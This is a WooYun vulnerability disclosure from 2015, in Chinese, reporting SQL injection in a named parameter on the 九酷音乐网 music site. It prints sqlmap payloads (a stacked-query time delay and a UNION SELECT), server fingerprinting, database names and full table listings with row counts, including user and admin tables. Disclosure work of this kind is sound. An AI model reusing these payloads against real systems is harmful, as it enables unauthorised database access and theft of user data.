当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145173

漏洞标题:九酷音乐网某处SQL注入

相关厂商:九酷音乐网

漏洞作者: 花式

提交时间:2015-10-08 14:21

修复时间:2015-11-22 14:22

公开时间:2015-11-22 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

九酷音乐网某处SQL注入

详细说明:

box.9ku.com/downloadapp.aspx?t=


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: t (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: t=';WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: t=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(120)+CHAR(1
07)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(112)+CHAR(80)+CHAR(105)+CHAR(106)+CHAR(72)+CHAR(77)+CHAR(122)+
CHAR(80)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)--
---
[13:33:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[13:33:52] [INFO] fetching database names
[13:33:52] [INFO] the SQL query used returns 20 entries
[13:33:52] [INFO] resumed: 9ku2
[13:33:52] [INFO] resumed: 9kumusic_so
[13:33:52] [INFO] resumed: anspa
[13:33:52] [INFO] resumed: banquan
[13:33:52] [INFO] resumed: BoxDataAnalysis
[13:33:52] [INFO] resumed: ChinaData
[13:33:52] [INFO] resumed: delfiles
[13:33:52] [INFO] resumed: distribution
[13:33:52] [INFO] resumed: kanqq
[13:33:52] [INFO] resumed: kuiliguo
[13:33:52] [INFO] resumed: kuwodb
[13:33:52] [INFO] resumed: master
[13:33:52] [INFO] resumed: model
[13:33:52] [INFO] resumed: msdb
[13:33:52] [INFO] resumed: music9ku2013
[13:33:52] [INFO] resumed: music9ku2015
[13:33:52] [INFO] resumed: ReportServer
[13:33:52] [INFO] resumed: ReportServerTempDB
[13:33:52] [INFO] resumed: tempdb
[13:33:52] [INFO] resumed: zhuaqu
available databases [20]:
[*] 9ku2
[*] 9kumusic_so
[*] anspa
[*] banquan
[*] BoxDataAnalysis
[*] ChinaData
[*] delfiles
[*] distribution
[*] kanqq
[*] kuiliguo
[*] kuwodb
[*] master
[*] model
[*] msdb
[*] music9ku2013
[*] music9ku2015
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zhuaqu


Database: kuwodb
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.tb_htmlData0 | 2452130 |
+------------------+---------+

漏洞证明:

Database: music9ku2013
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.tempsearch_keys_count_all | 4565981 |
| dbo.tempsearch_keys_count_all | 4565981 |
| dbo.tempCount | 2004061 |
| dbo.make_log | 1214989 |
| dbo.zhuanji_music | 901787 |
| dbo.zhuanji_music | 901787 |
| dbo.Track | 779703 |
| dbo.qzone_bdaddr | 740104 |
| dbo.Tag_Music | 661195 |
| dbo.BaiDuAPI | 638593 |
| dbo.MusicList | 598213 |
| dbo.View_IOS_SongList_Singer | 598213 |
| dbo.View_Tag_MusicFm | 509684 |
| dbo.bitrate | 498653 |
| dbo.View_fl_Musicwithfl | 487997 |
| dbo.[top100_zhuanji_music--] | 461312 |
| dbo.[top100_zhuanji_music--] | 461312 |
| dbo._gpz | 401923 |
| dbo.View_Tag_MusicBang | 387487 |
| dbo.Ipaddress | 373692 |
| dbo.admin_log | 373488 |
| dbo.st_pinglun | 368831 |
| dbo.qy_mv22_bak0426 | 324489 |
| dbo.qy_mv22_bak0426 | 324489 |
| dbo.View_IOS_Index_1 | 256172 |
| dbo.View_IOS_Index_2 | 256172 |
| dbo.View_Ph_MusicWithfl | 246825 |
| dbo.st_class_music_bak | 232062 |
| dbo.st_class_music_bak | 232062 |
| dbo.st_class_music_bak | 232062 |
| dbo.ph_byhits | 228138 |
| dbo.ph_byhitsyesmonth | 228138 |
| dbo.ph_byhitsyesweek | 228138 |
| dbo.ph_bymdate | 228138 |
| dbo.ph_gqabcd_hym | 228138 |
| dbo.reguser | 216222 |
| dbo.wailian_count | 212119 |
| dbo.zq_music | 162248 |
| dbo.tempsearch_count_all | 141535 |
| dbo.tempsearch_count_all | 141535 |
| dbo._301zhengchang | 140232 |
| dbo.Temp_dellt5 | 121782 |
| dbo.Temp_dellt5 | 121782 |
| dbo.geshou_xc | 105482 |
| dbo.fl_music | 87882 |
| dbo.geshou_xsyr | 83462 |
| dbo.video_erge | 82553 |
| dbo.fmmusic | 79772 |
| dbo.lrclist | 78526 |
| dbo.qqgedan_music | 73367 |
| dbo.qqgedan_music | 73367 |
| dbo.iqiyi_music | 72224 |
| dbo.[top100_down--] | 61973 |
| dbo.tagGoodMusic | 60248 |
| dbo.badkeyword | 57304 |
| dbo.View_TagGoodMusic_Musiclist | 49769 |
| dbo.hits | 49644 |
| dbo.NClass | 46592 |
| dbo.EmoteMusic | 43020 |
| dbo._musiczt | 39667 |
| dbo.temp_keys | 37382 |
| dbo.html_m9ku2 | 35817 |
| dbo.html_m9ku2 | 35817 |
| dbo.MvList | 35021 |
| dbo.fuyin_daogao | 32379 |
| dbo._chongfu | 31497 |
| dbo.monitorip_traffic | 30921 |
| dbo.monitorip_traffic | 30921 |
| dbo.html_www9ku2 | 27555 |
| dbo.html_www9ku2 | 27555 |
| dbo._wangluomv | 26754 |
| dbo.K_book | 24831 |
| dbo._musicdj | 21082 |
| dbo.Tag_GeShou | 18873 |
| dbo.View_Tag_Geshou | 18789 |
| dbo.Artist | 18627 |
| dbo._del_musiclist_dj | 14222 |
| dbo.qzone_music | 13994 |
| dbo.zjlist | 13109 |
| dbo._yingwenmv | 11584 |
| dbo.st_geshou | 11298 |
| dbo.[top100_gs--] | 9748 |
| dbo._musiclist | 9679 |
| dbo._makegq | 9284 |
| dbo._gaopinzhi | 8453 |
| dbo._duomiGspic | 7686 |
| dbo.app_yinyuefengge | 7005 |
| dbo.zq_geshou | 6056 |
| dbo.pinglun_gequ | 5711 |
| dbo.ph_foreign | 5264 |
| dbo._m4a | 5000 |
| dbo._yue51 | 4996 |
| dbo._yue51 | 4996 |
| dbo._qinquangequ | 4209 |
| dbo.qy_mv_bak | 4097 |
| dbo.qy_mv_bak | 4097 |
| dbo.jiuku_poll | 3717 |
| dbo.zq_kupig4zj | 3633 |
| dbo.errlrcid | 3225 |
| dbo._allplayidcheck | 3167 |
| dbo.geshou_gaoqing | 2707 |
| dbo.temp_zjpic | 2423 |
| dbo.fuyin_music | 2309 |
| dbo.BlackName | 2038 |
| dbo.app_random | 2000 |
| dbo.lrcedit | 1786 |
| dbo.user_up2 | 1721 |
| dbo.user_up2 | 1721 |
| dbo.fuyin_jianzheng | 1659 |
| dbo.APIForBaiDu | 1613 |
| dbo._jingdianmv | 1589 |
| dbo.cpgs | 1498 |
| dbo.video_jidu_zjv | 1381 |
| dbo.video_jidu_zjv | 1381 |
| dbo._yingwen_music | 1202 |
| dbo._allhits | 1126 |
| dbo.PaiHangBang | 1121 |
| dbo.replacekey | 1039 |
| dbo.qinquan20141103 | 1016 |
| dbo.admin_count | 894 |
| dbo.K_link | 803 |
| dbo.search_top500 | 727 |
| dbo.fmlist | 719 |
| dbo._mp3a_xinqing2 | 594 |
| dbo._mp3a_xinqing2 | 594 |
| dbo.temp_filter | 586 |
| dbo._128k | 552 |
| dbo._top500 | 499 |
| dbo.View_MusicBang_Jingdian500 | 494 |
| dbo.top500 | 488 |
| dbo.TongJiZuoRiShiTingZongShu | 457 |
| dbo.temp_gutai | 387 |
| dbo.View_Ph_Others | 343 |
| dbo.View_Ph_MusicWithHits | 341 |
| dbo.view_phone_index | 335 |
| dbo._nomp3file | 312 |
| dbo.TempIndexTjZj | 307 |
| dbo.newi_musiclist | 260 |
| dbo.CollectionParagraph | 252 |
| dbo.survey_homepage | 229 |
| dbo.survey_homepage | 229 |
| dbo.fl_class_two | 224 |
| dbo.fl_class_two | 224 |
| dbo.Musiczj | 177 |
| dbo.NoMusic | 170 |
| dbo.k_phone | 141 |
| dbo.cpmusic | 131 |
| dbo.CollectionList | 124 |
| dbo._ertonggequ | 110 |
| dbo.zq_nofenlei | 102 |
| dbo.TempLrc | 85 |
| dbo.tempsearch_key | 78 |
| dbo.MusicServerIP | 57 |
| dbo.temp_tbso | 49 |
| dbo.check_play | 46 |
| dbo.fm_class | 40 |
| dbo.TempAlbum | 39 |
| dbo.Temp_RecordErrUrl | 33 |
| dbo.TempArtist | 32 |
| dbo.delFiles | 28 |
| dbo.Tags_gs | 28 |
| dbo.Tags_gs | 28 |
| dbo.index_jiuku_tuijian | 22 |
| dbo.temp_indexis24 | 22 |
| dbo.temp_indexis24 | 22 |
| dbo.newi_zhuanji | 18 |
| dbo.geshou_xingzhi | 16 |
| dbo.erge_music_bang | 15 |
| dbo.SClass | 15 |
| dbo.syncobj_0x3935384432373538 | 15 |
| dbo.Box_Pc | 12 |
| dbo.cp_music | 12 |
| dbo.amdin8629tom | 11 |
| dbo.K_web | 10 |
| dbo.admin_musicModifyCount | 7 |
| dbo.baidu9ku_indexgeshou | 6 |
| dbo.cp_zj | 6 |
| dbo.baidu9ku_indexmusic | 5 |
| dbo.Box_Pic | 5 |
| dbo.cp_geshou | 5 |
| dbo.TempRefresh | 5 |
| dbo.cp_user | 4 |
| dbo.singerHD | 4 |
| dbo._downkuaijie | 3 |
| dbo._small | 2 |
| dbo.tempding | 2 |
| dbo.Box_Android | 1 |
| dbo.Class | 1 |
| dbo.jk_config | 1 |
| dbo.syncobj_0x3931363942363633 | 1 |
+---------------------------------+---------+


Database: music9ku2015
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.tempsearch_keys_count_all | 4565979 |
| dbo.tempsearch_keys_count_all | 4565979 |
| dbo.make_log | 3547004 |
| dbo.qinquanmusic | 2143018 |
| dbo.zhuanji_music | 905271 |
| dbo.zhuanji_music | 905271 |
| dbo.Track | 779703 |
| dbo.qzone_bdaddr | 740104 |
| dbo.Tag_Music | 673510 |
| dbo.BaiDuAPI | 650935 |
| dbo.MusicList | 601321 |
| dbo.View_IOS_Index_1 | 601321 |
| dbo.View_IOS_SongList_Singer | 601321 |
| dbo.View_Tag_MusicBang | 589165 |
| dbo.bitrate | 498653 |
| dbo.View_fl_Musicwithfl | 495751 |
| dbo.[tp100_zhuanji_music--] | 461312 |
| dbo.[tp100_zhuanji_music--] | 461312 |
| dbo._gpz | 401923 |
| dbo.admin_log | 397630 |
| dbo.Ipaddress | 373692 |
| dbo.st_pinglun | 368831 |
| dbo.qy_mv22_bak0426 | 324489 |
| dbo.qy_mv22_bak0426 | 324489 |
| dbo.View_IOS_Index_2 | 259295 |
| dbo.st_class_music_bak | 232062 |
| dbo.st_class_music_bak | 232062 |
| dbo.st_class_music_bak | 232062 |
| dbo.reguser | 216222 |
| dbo.wailian_count | 212119 |
| dbo.View_Tag_MusicFm | 169641 |
| dbo.zq_music | 162248 |
| dbo.tempsearch_count_all | 141535 |
| dbo.tempsearch_count_all | 141535 |
| dbo._301zhengchang | 140232 |
| dbo.qqgedan_music | 137169 |
| dbo.qqgedan_music | 137169 |
| dbo.Temp_dellt5 | 121782 |
| dbo.Temp_dellt5 | 121782 |
| dbo.geshou_xc | 105482 |
| dbo.fl_music | 102433 |
| dbo.iqiyi_music | 83823 |
| dbo.geshou_xsyr | 83462 |
| dbo.video_erge | 83291 |
| dbo.lrclist | 82433 |
| dbo.fmmusic | 79887 |
| dbo.View_Ph_MusicWithfl | 71261 |
| dbo.ph_byhits | 66456 |
| dbo.ph_byhitsyesmonth | 66456 |
| dbo.ph_byhitsyesweek | 66456 |
| dbo.ph_bymdate | 66456 |
| dbo.ph_gqabcd_hym | 66456 |
| dbo.[tp100_down--] | 61973 |
| dbo.tagGoodMusic | 60317 |
| dbo.badkeyword | 57305 |
| dbo.hits | 49644 |
| dbo.NClass | 47009 |
| dbo.EmoteMusic | 43020 |
| dbo.temp_keys | 37382 |
| dbo.MvList | 35021 |
| dbo._chongfu | 31497 |
| dbo.monitorip_traffic | 30921 |
| dbo.monitorip_traffic | 30921 |
| dbo._zhuanm4a | 28833 |
| dbo._wangluomv | 26754 |
| dbo.K_book | 25435 |
| dbo.fuyin_daogao | 22317 |
| dbo._musicdj | 21082 |
| dbo.Tag_GeShou | 19270 |
| dbo.View_Tag_Geshou | 19176 |
| dbo.Artist | 18627 |
| dbo._musiczt | 17449 |
| dbo._makegq | 16242 |
| dbo._del_musiclist_dj | 14222 |
| dbo.qzone_music | 13994 |
| dbo.zjlist | 13109 |
| dbo._yingwenmv | 11584 |
| dbo.st_geshou | 11298 |
| dbo._songtaste | 10197 |
| dbo.[tp100_gs--] | 9748 |
| dbo._musiclist | 9679 |
| dbo._gaopinzhi | 8453 |
| dbo._duomiGspic | 7686 |
| dbo.zuoci2 | 7343 |
| dbo.zuoci2 | 7343 |
| dbo.app_yinyuefengge | 7005 |
| dbo.zq_geshou | 6056 |
| dbo.pinglun_gequ | 5711 |
| dbo.ph_foreign | 5264 |
| dbo._m4a | 5131 |
| dbo._yue51 | 4996 |
| dbo._yue51 | 4996 |
| dbo._qinquangequ | 4209 |
| dbo.qy_mv_bak | 4097 |
| dbo.qy_mv_bak | 4097 |
| dbo.jiuku_poll | 3717 |
| dbo.zq_kupig4zj | 3633 |
| dbo.errlrcid | 3225 |
| dbo._allplayidcheck | 3167 |
| dbo.geshou_gaoqing | 2722 |
| dbo.View_TagGoodMusic_Musiclist | 2663 |
| dbo.temp_zjpic_6_17 | 2423 |
| dbo.temp_zjpic_6_17 | 2423 |
| dbo.fuyin_music | 2309 |
| dbo.lrcedit | 2283 |
| dbo.BlackName | 2038 |
| dbo._index_to_m4a | 2000 |
| dbo.app_random | 2000 |
| dbo.fuyin_jianzheng | 1798 |
| dbo.user_up2 | 1721 |
| dbo.user_up2 | 1721 |
| dbo.APIForBaiDu | 1613 |
| dbo._jingdianmv | 1589 |
| dbo.cpgs | 1498 |
| dbo._replace | 1416 |
| dbo.video_jidu_zjv | 1381 |
| dbo.video_jidu_zjv | 1381 |
| dbo._yingwen_music | 1202 |
| dbo.PaiHangBang | 1121 |
| dbo.replacekey | 1039 |
| dbo.qinq20141103 | 1016 |
| dbo.admin_count | 1007 |
| dbo.music_company | 928 |
| dbo.K_link | 818 |
| dbo.search_top500 | 727 |
| dbo.fmlist | 719 |
| dbo.tempCount | 647 |
| dbo.temp_filter | 586 |
| dbo._allhits | 577 |
| dbo.TongJiZuoRiShiTingZongShu | 568 |
| dbo._128k | 552 |
| dbo._top500 | 499 |
| dbo.View_MusicBang_Jingdian500 | 494 |
| dbo.top500 | 488 |
| dbo.view_phone_index | 464 |
| dbo.delFiles | 404 |
| dbo.temp_gutai | 387 |
| dbo.music_Song | 382 |
| dbo.View_Ph_MusicWithHits | 324 |
| dbo._nomp3file | 312 |
| dbo.TempIndexTjZj | 307 |
| dbo.CollectionParagraph | 291 |
| dbo.newi_musiclist | 260 |
| dbo.survey_homepage | 229 |
| dbo.survey_homepage | 229 |
| dbo.fl_class_two | 228 |
| dbo.fl_class_two | 228 |
| dbo.music_Album | 195 |
| dbo.Musiczj | 177 |
| dbo.NoMusic | 170 |
| dbo.CollectionList | 144 |
| dbo.k_phone | 141 |
| dbo.cpmusic | 131 |
| dbo.View_Ph_Others | 121 |
| dbo._ertonggequ | 110 |
| dbo.zq_nofenlei | 102 |
| dbo.TempLrc | 85 |
| dbo.MusicServerIP | 57 |
| dbo.fm_class | 52 |
| dbo.qinquanmid | 51 |
| dbo.check_play | 46 |
| dbo.TempAlbum | 39 |
| dbo.Temp_RecordErrUrl | 33 |
| dbo.TempArtist | 32 |
| dbo.Tags_gs | 28 |
| dbo.Tags_gs | 28 |
| dbo.index_jiuku_tuijian | 22 |
| dbo.temp_indexis24 | 22 |
| dbo.temp_indexis24 | 22 |
| dbo.newi_zhuanji | 18 |
| dbo.geshou_xingzhi | 16 |
| dbo.erge_music_bang | 15 |
| dbo.SClass | 15 |
| dbo.syncobj_0x3935384432373538 | 15 |
| dbo.amdin8629tom | 13 |
| dbo.cp_music | 12 |
| dbo.fuyin_mydaogao | 11 |
| dbo.K_web | 11 |
| dbo.admin_musicModifyCount | 7 |
| dbo.baidu9ku_indexgeshou | 6 |
| dbo.Box_App | 6 |
| dbo.cp_zj | 6 |
| dbo.baidu9ku_indexmusic | 5 |
| dbo.Box_Pic1 | 5 |
| dbo.Box_Pic1 | 5 |
| dbo.cp_geshou | 5 |
| dbo.fuyin_myjianzheng | 5 |
| dbo.TempRefresh | 5 |
| dbo.cp_user | 4 |
| dbo.singerHD | 4 |
| dbo._downkuaijie | 3 |
| dbo._mp3a_xinqing2 | 2 |
| dbo._mp3a_xinqing2 | 2 |
| dbo._small | 2 |
| dbo.tempding | 2 |
| dbo.Class | 1 |
| dbo.jk_config | 1 |
| dbo.syncobj_0x3931363942363633 | 1 |
+---------------------------------+---------+


修复方案:

版权声明:转载请注明来源 花式@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价